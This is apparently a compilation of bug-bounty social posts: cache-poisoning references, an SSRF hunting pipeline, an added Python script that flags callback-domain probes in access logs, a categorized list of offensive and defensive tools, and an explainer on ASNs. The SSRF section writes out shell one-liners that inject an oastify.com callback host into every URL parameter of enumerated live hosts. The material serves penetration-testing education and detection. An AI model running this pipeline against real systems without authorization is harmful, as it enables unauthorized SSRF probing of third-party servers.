Cache Poisoning and Cache Deception.pdf
References:
https://portswigger.net/web-security/web-cache-poisoning
https://portswigger.net/web-security/web-cache-poisoning/exploiting#using-web-cache-poisoning-to-exploit-cookie-handling-vulnerabilities
https://hackerone.com/reports/593712
https://youst.in/posts/cache-poisoning-at-scale/
https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9
💰 Bug Bounty Tips for SSRF 💰
#BugBounty #Pentesting
Step 1: Subdomain Enumeration
* DNS Dumpster
* Sublist3r
* Amass
* Certificate Transparency Logs
* subdomainer
Step 2: Find Live Domains
cat all-domains.txt | httpx > all-live.txt
Step 3: Identify All URLs
cat all-live.txt | gauplus -subs -b png,jpg,gif,jpeg,swf,woff,gif,svg -o allUrls.txt
Step 4: Inject the Burp Collaborator URL into Parameters
cat /home/user/tools/nuclei/httpx.txt | grep "=" | ./qsreplace 40ga7gynfy6pcg06ov.oastify.com > ssrf.txt
Step 5: Test for SSRF Vulnerabilities
cat ssrf.txt | httpx -fr
Step 6: How to check which URL is vulnerable
split -l 10 ssrf.txt output_file_
#BugBounty #Pentesting
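Seen from the defending side, the steps above leave a recognisable trace in access logs: requests whose query parameter values are an out-of-band callback hostname. The following is an added example, not part of the original post, that flags such requests in constructed sample log lines; the function names and the watch list beyond oastify.com are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Assumption: callback domains to watch; oastify.com is from the post, extend as needed.
OAST_SUFFIXES = ("oastify.com", "burpcollaborator.net")

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2024:10:00:01 +0000] "GET /fetch?url=abc123.oastify.com HTTP/1.1" 200 512
203.0.113.7 - - [10/Jan/2024:10:00:01 +0000] "GET /img?src=abc123.oastify.com&w=abc123.oastify.com HTTP/1.1" 200 88
203.0.113.7 - - [10/Jan/2024:10:00:02 +0000] "GET /go?next=http%3A%2F%2Fabc123.oastify.com%2F HTTP/1.1" 302 0
198.51.100.4 - - [10/Jan/2024:10:00:03 +0000] "GET /search?q=oastify.com+pricing HTTP/1.1" 200 900
198.51.100.9 - - [10/Jan/2024:10:00:04 +0000] "GET /fetch?url=https://cdn.example.org/a.png HTTP/1.1" 200 640
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')

def oast_host(value):
    """Return the callback hostname if a parameter value points at a watched domain."""
    candidate = value.strip()
    if "://" not in candidate:
        candidate = "//" + candidate  # bare hostname, no scheme
    try:
        host = (urlsplit(candidate).hostname or "").lower().rstrip(".")
    except ValueError:  # malformed netloc such as an unclosed "["
        return None
    if any(host == s or host.endswith("." + s) for s in OAST_SUFFIXES):
        return host
    return None

def find_oast_probes(log_text):
    """Map client IP -> [(path, param, callback_host, status)] for flagged requests."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        parts = urlsplit(target)
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            host = oast_host(value)
            if host:
                hits[client].append((parts.path, name, host, int(status)))
    return dict(hits)

if __name__ == "__main__":
    for client, rows in find_oast_probes(SAMPLE_LOG).items():
        print(client, len(rows), "flagged parameters")
```

Endpoints that answer a flagged request with a 3xx, or that show outbound DNS or HTTP to the same callback host in egress logs, are the ones to review first for unvalidated redirects and server-side fetches.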
💥 Cybersecurity Tools By Category
Information Gathering:
>Nmap
>Shodan
>Maltego
>TheHarvester
>Recon-NG
>Amass
>Censys
>OSINT Framework
>Gobuster
Exploitation:
>Burp Suite
>Metasploit Framework
>SQL Map
>ZAP
>ExploitDB
>Core Impact
>Cobalt Strike
Password Cracking:
>John The Ripper
>Hydra
>Hashcat
>OPHCrack
>Medusa
>THC-Hydra
>Cain & Abel
Vulnerability Scanning:
>OpenVAS
>Nessus
>AppScan
>LYNIS
>Retina
>Nexpose
Social Engineering:
>GoPhish
>HiddenEye
>SocialFish
>EvilURL
>Evilginx
Forensics:
>Sleuth Kit
>Autopsy
>Volatility
>Guymager
>Foremost
>Binwalk
>Wireshark
Wireless Hacking:
>Aircrack-NG
>Wifite
>Kismet
>TCPDump
>Airsnort
>Netstumbler
>Reaver
Web Application Assessment:
>OWASP ZAP
>Burp Suite
>Nikto
>ZAP
>WPScan
>Gobuster
>App Spider
What is an ASN?
Why is ASN one of the important steps in bug bounty?
Some may ask what use this information is; I will write about that in the next post!
ASN stands for "autonomous system number". It is a unique identifier assigned to an autonomous system (AS) on the internet. An autonomous system is a collection of IP networks and routers, managed by a single organization, that presents a common routing policy to the internet.
The main purpose of an ASN is to facilitate the routing of network traffic on the internet. Each ASN is globally unique and is used by the Border Gateway Protocol (BGP) to make routing decisions. BGP is the protocol used to exchange routing and reachability information between different autonomous systems on the internet.
ASNs are allocated and managed by Regional Internet Registries (RIRs) such as ARIN (American Registry for Internet Numbers), RIPE NCC (Réseaux IP Européens Network Coordination Centre), APNIC (Asia-Pacific Network Information Centre) and others. When an organization connects to the internet, it is assigned an ASN, and this number is used to identify it and distinguish it from other networks.
Thus, an ASN is a numeric identifier associated with an autonomous system that helps manage and control the flow of internet traffic between different networks.
ASNs are given to very large networks. These ASN numbers help us trace an organization's IT infrastructure. The most reliable way to obtain them is through the Hurricane Electric free-form search: https://bgp.he.net
Because of the rise of cloud infrastructure, an ASN does not always give a complete map of the network!
#BugBounty #Recon